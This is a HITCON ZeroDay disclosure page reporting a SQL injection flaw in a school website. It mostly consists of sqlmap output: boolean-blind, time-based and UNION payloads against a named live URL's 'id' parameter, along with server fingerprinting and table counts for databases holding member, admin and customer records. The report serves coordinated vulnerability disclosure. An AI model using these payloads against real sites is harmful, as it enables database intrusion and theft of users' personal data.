奥莱尔双语学校SQL漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00408
  •  發信 Vendor: TACERT台灣學術網路危機處理中心
  • Title: 奥莱尔双语学校SQL漏洞
  • Introduction: 奥莱尔双语学校SQL

處理狀態

目前狀態

公開
Last Update : 2018/06/06
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/04/06 23:55:02 : 新提交 (由 Cra5h 更新此狀態)
  • 2018/04/07 00:28:07 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/07 00:28:09 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/07 20:11:38 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/07 20:11:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/07 20:11:40 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/06/06 03:00:25 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-00408
  • 通報者:cra5h (Cra5h)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.cornell.tyc.edu.tw/charact.php?id=39

敘述

奥莱尔双语学校SQL
SQL位置:
http://www.cornell.tyc.edu.tw/charact.php?id=39

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 79 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=39 AND 9160=9160

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=39 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=-4551 UNION ALL SELECT NULL,NULL,CONCAT(0x716a627871,0x644650745057776e7377687769526e4757704d765179544249667378704d4654744f73466d77564f,0x7170787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- lSVL

[22:50:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[22:50:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.cornell.tyc.edu.tw'

确认影响库:(3个)
available databases [3]:
[] cornell
[] information_schema
[*] test

[22:51:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.cornell.tyc.edu.tw'

查看数据量:
Database: cornell
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| goods_img | 199320 |
| member_log | 26456 |
| goods_img3 | 3938 |
| goods_img2 | 3284 |
| product | 1062 |
| member | 963 |
| sms_history | 266 |
| product1 | 117 |
| productclass | 92 |
| faq | 82 |
| contactus1 | 46 |
| productclass1 | 46 |
| download | 18 |
| suite | 16 |
| project | 15 |
| about_manage | 13 |
| news | 12 |
| link | 10 |
| attribute1 | 8 |
| downloadclass | 8 |
| projectclass | 8 |
| attribute2 | 7 |
| contactus | 6 |
| contactus2 | 5 |
| admin | 3 |
| attribute | 3 |
| myorders | 3 |
| mytype | 3 |
| mytype1 | 3 |
| suite_group | 3 |
| controltype | 2 |
| member_group | 2 |
| mytype2 | 2 |
| newsclass | 2 |
| sms_text | 2 |
| yesorno | 2 |
| admin_group | 1 |
| book | 1 |
| company | 1 |
| mails | 1 |
| setup | 1 |
+---------------------------------------+---------+

Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| address | 379 |
| customer | 291 |
| courses_regist | 130 |
| courses_date | 95 |
| courses | 88 |
| news | 46 |
| album_img | 37 |
| knowledge | 32 |
| suite | 23 |
| goods | 14 |
| banner | 6 |
| goods_level | 6 |
| suite_group | 6 |
| links | 5 |
| download | 4 |
| about_us | 3 |
| album | 3 |
| courses_status | 3 |
| download_type | 2 |
| message | 2 |
| new1 | 2 |
| admin | 1 |
| admin_group | 1 |
| banner_set | 1 |
| books | 1 |
| core | 1 |
| fbook_file | 1 |
| message_schedule | 1 |
| seo | 1 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1218 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| PARTITIONS | 110 |
| TABLES | 110 |
| STATISTICS | 98 |
| KEY_COLUMN_USAGE | 67 |
| TABLE_CONSTRAINTS | 67 |
| CHARACTER_SETS | 39 |
| PLUGINS | 23 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

[22:52:43] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.cornell.tyc.edu.tw'

修補建議

过滤,参数化

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;